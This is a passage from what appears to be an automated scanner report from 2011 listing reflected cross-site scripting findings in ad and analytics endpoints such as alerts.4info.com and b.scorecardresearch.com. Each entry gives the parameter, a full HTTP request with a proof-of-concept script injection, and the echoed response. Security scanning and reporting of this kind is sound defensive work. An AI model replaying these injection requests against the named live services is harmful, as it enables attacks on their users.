GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef235f2<script>alert(1)</script>4125eaa7b51&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17271
Date: Sat, 17 Sep 2011 01:52:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<style type="text/css">
html, body { margin:0; padding:0; height:100%; border:none; background-color:efefef235f2<script>alert(1)</script>4125eaa7b51 }


</style>
...[SNIP]...

4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_border request parameter is copied into the HTML document as plain text between tags. The payload aa51b<script>alert(1)</script>c93f4630dc4 was submitted in the color_border parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefefaa51b<script>alert(1)</script>c93f4630dc4&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:51:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
rder:none; }
a, a:visited { color:#000099; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefefaa51b<script>alert(1)</script>c93f4630dc4; }
.TitleText { color:#000000; font-weight:bold; font-size:10px; }
.NormalText { color:#000000; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }

#header
...[SNIP]...

4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_link request parameter is copied into the HTML document as plain text between tags. The payload 76dc4<script>alert(1)</script>e5a3998eb1c was submitted in the color_link parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=00009976dc4<script>alert(1)</script>e5a3998eb1c&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:52:31 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<style type="text/css">

html, body { margin:0; padding:0; height:100%; border:none; }
a, a:visited { color:#00009976dc4<script>alert(1)</script>e5a3998eb1c; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000; font-weig
...[SNIP]...

4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_text_normal request parameter is copied into the HTML document as plain text between tags. The payload 86a95<script>alert(1)</script>6511ba6bdbc was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=00000086a95<script>alert(1)</script>6511ba6bdbc&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17230
Date: Sat, 17 Sep 2011 01:53:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
lor:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000; font-weight:bold; font-size:10px; }
.NormalText { color:#00000086a95<script>alert(1)</script>6511ba6bdbc; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }

#headerDiv { background-color:#FFF;margin:2px;margin-top:0px;font-size:11px;font-weight:bold; }
#header
...[SNIP]...

4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_text_normal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3c7"><script>alert(1)</script>9ace1e3c9ad was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000bc3c7"><script>alert(1)</script>9ace1e3c9ad&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17234
Date: Sat, 17 Sep 2011 01:53:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000bc3c7"><script>alert(1)</script>9ace1e3c9ad;background-color:#efefef">
...[SNIP]...

4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_text_title request parameter is copied into the HTML document as plain text between tags. The payload 835d5<script>alert(1)</script>6102431f71c was submitted in the color_text_title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000835d5<script>alert(1)</script>6102431f71c&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:52:50 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
lor:#000099; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000835d5<script>alert(1)</script>6102431f71c; font-weight:bold; font-size:10px; }
.NormalText { color:#000000; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }

#headerDiv { background-color:#FFF;mar
...[SNIP]...

4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the default_league request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 688d1'%3balert(1)//add2da0c4a4 was submitted in the default_league parameter. This input was echoed as 688d1';alert(1)//add2da0c4a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl688d1'%3balert(1)//add2da0c4a4&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17176
Date: Sat, 17 Sep 2011 01:53:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
Id, conference, conferenceId, teamId);
populateMenu("leagueId", "leagues", "", "", "", "", "");

function setLeague() {
   if (getSelectVal('leagueId') == '-1') {
       defaultSelectTo('leagueId', 'nfl688d1';alert(1)//add2da0c4a4');
       setTimeout('leagueSelect()',500);
   }
}
function setConference() {
   if (getSelectVal('conferenceId') == '-1') {
       defaultSelectTo('conferenceId', 'null');
       setTimeout('conferenceSelect()'
...[SNIP]...

4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the default_team request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82a46'%3balert(1)//40d577401fd was submitted in the default_team parameter. This input was echoed as 82a46';alert(1)//40d577401fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=82a46'%3balert(1)//40d577401fd&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17176
Date: Sat, 17 Sep 2011 01:54:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
ceId') == '-1') {
       defaultSelectTo('conferenceId', 'null');
       setTimeout('conferenceSelect()',500);
   }
}
function setTeam() {
   if (getSelectVal('teamId') == '-1')
       defaultSelectTo('teamId', '82a46';alert(1)//40d577401fd');
}

setTimeout('setLeague()',500);
setTimeout('setLeague()',1500);
setTimeout('setLeague()',2500);


setTimeout('setTeam()',1500);
setTimeout('setTeam()',2500);
setTimeout('setTeam()
...[SNIP]...

4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload b2604<script>alert(1)</script>e25fa51e76a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:17:40 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=af410166-6960-4ca8-98db-488008c83cf7;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a)

4.63. http://api.dimestore.com/viapi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7be4b<a>cfdf0815b78 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=7117492757be4b<a>cfdf0815b78 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0FpdVF%2BSWQ%3D; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=""; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%3D=dQ%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 17 Sep 2011 01:06:42 GMT
Content-Type: application/xml
Connection: keep-alive
Set-Cookie: pixel_7117492757be4b<a>cfdf0815b78=1; Expires=Sun, 16-Sep-2012 01:06:42 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 7117492757be4b<a>cfdf0815b78

4.64. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8df99<script>alert(1)</script>8a03bb991cc was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc&n=ar_int_p63514475&1316238877286 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:55:06 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc("");

4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 41452<script>alert(1)</script>b5bc8226dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=741452<script>alert(1)</script>b5bc8226dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:02 GMT
Date: Sat, 17 Sep 2011 00:52:02 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"741452<script>alert(1)</script>b5bc8226dea", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 66a83<script>alert(1)</script>803fdeef77b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=17&c4=http%3A%2F%2Fwww.bradsdeals.com&c5=&c6=&c10=66a83<script>alert(1)</script>803fdeef77b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 01:37:02 GMT
Date: Sat, 17 Sep 2011 01:37:02 GMT
Content-Length: 1261
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"17", c4:"http://www.bradsdeals.com", c5:"", c6:"", c10:"66a83<script>alert(1)</script>803fdeef77b", c15:"", c16:"", r:""});



4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 961ba<script>alert(1)</script>5ef4d07457b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=961ba<script>alert(1)</script>5ef4d07457b&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:09 GMT
Date: Sat, 17 Sep 2011 00:52:09 GMT
Content-Length: 1235
Connection: close

